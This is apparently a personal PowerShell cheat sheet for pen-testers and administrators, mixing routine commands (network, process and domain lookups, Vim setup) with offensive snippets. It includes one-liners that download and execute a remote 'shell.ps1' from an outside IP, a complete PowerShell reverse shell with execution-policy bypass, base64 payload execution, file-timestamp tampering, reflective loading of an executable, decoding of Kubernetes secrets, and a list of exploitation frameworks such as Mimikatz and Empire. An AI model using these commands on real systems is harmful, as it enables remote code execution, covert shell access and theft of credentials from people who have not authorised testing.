
PowerShell for Hackers
As I’m learning more PowerShell and dabbling into hacking I will be composing a list of techniques and scripts that I find very beneficial for administration and pen-testing.
Basics
1 |
ipconfig |
Linux Like Watch Command
1 |
while (1) { docker ps -a ; sleep 5} |
System Running Processes
1 |
Get-Process |
IP to Hostname
1 |
[System.Net.Dns]::GetHostByAddress('192.168.0.10').HostName |
Is Server Virtual or Physical?
1 |
systeminfo /s %computername% | findstr /c:"Model:" /c:"Host Name" /c:"OS Name" |
Lookup User Information
1 2 3 4 5 |
# get domain information of a user net user /domain jamie.bowman # get groups of current user whoami /groups |
Change File Modified Date and Time
1 |
(dir sample_file.txt).LastWriteTime = New-object DateTime 1976,12,31 |
Find Apps Running on Port
1 2 3 4 5 6 7 8 |
# finds pids using port 53 Get-Process -Id (Get-NetTCPConnection -LocalPort 53).OwningProcess # find pids listening on port 80 netstat -ano | findstr ":80" # look up pids tasklist | findstr "4" |
Base64
1 2 3 4 5 6 7 8 9 |
# convert to base64 [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes('whoami')) # d2hvYW1p # convert from base64 [Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('d2hvYW1p')) # execute a base64 payload in powershell powershell.exe -command "[Text.Encoding]::Utf8.GetString([Convert]::FromBase64String('d2hvYW1p'))" |
Querying Databases
https://gist.github.com/cmatskas/08411b916ab01e3f1439#file-powershellsqlquery-ps1
Domain Controllers
1 2 3 4 5 |
# get current domain name $domainname = (Get-ADDomain).DNSRoot # get all dcs $dcs = Get-ADDomainController -Filter * -Server $DomainName | Select-Object Hostname,Ipv4address,isglobalcatalog,site,forest,operatingsystem |
Downloading Files with PowerShell
1 2 3 4 5 6 7 8 |
# powershell one-liner using System.Net.WebClient (New-Object System.Net.WebClient).DownloadFile('http://10.10.14.26/shell.ps1', 'shell.ps1') # powershell one-liner using Invoke-WebRequest Invoke-WebRequest -Uri 'http://10.10.14.26/shell.ps1'-OutFile 'shell.ps1' # download and invoke execution IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.26/shell.ps1') |
PowerShell Reverse Shells
1 |
powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('<LISTENERIP>',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" |
Kubernetes
kubectl get secret/nameofsecret -o json | jq '.data | map_values(@base64d)'
Loading Executables in PowerShell
1 2 |
[Reflection.Assembly]::LoadFile("C:\Users\mrjamiebowman\Desktop\defnotmal.exe") [DefNotMal.Program]::Main() |
If you screw up and have to unload your assembly try closing PowerShell. When an assembly is loaded like this in PowerShell it’s loaded into the AppDomain and remains there for the lifecycle of PowerShell.
Windows Exploit Suggester
While this is a python script. You will need to get the system info using PowerShell/CMD.
https://github.com/AonCyberLabs/Windows-Exploit-Suggester
1 |
systeminfo |
Copy and paste the results into a file and then commands can easily be ran against Windows Exploit Suggester which will help with privilege escalation.
PowerShell Frameworks & Tools
These are proven frameworks that can be used to reliably exploit a Windows environment.
- Mimikatz (not PowerShell but runs alongside…)
- Nishang
- Empire Framework
- PoshC2
- PowerUpSQL
- PowerSploit
- p0wnedShell
- Prowl
- PSAttack
- Pupy
- SharpSocks (C# but deployed by PowerShell)
Using Vim with PowerShell
First, you’ll need to install Vim. Download, run and install the file “gvim82.exe” (as of 02/06/2020)…
https://www.vim.org/download.php#pc
Once Vim is installed you’ll need to run PowerShell in Administrator mode to configure the integration.
1 2 3 4 5 6 7 8 9 |
# install Install-Package -Name PSReadline -Force -SkipPublisherCheck # create aliases New-Alias -Name vi -Value 'C:\Program Files (x86)\vim\vim82\vim.exe' New-Alias -Name vim -Value 'C:\Program Files (x86)\vim\vim82\vim.exe' # vim edit mode Set-PSReadlineOption -EditMode vi -BellStyle None |
You can learn more from this article.
https://codeandkeep.com/PowerShell-And-Vim/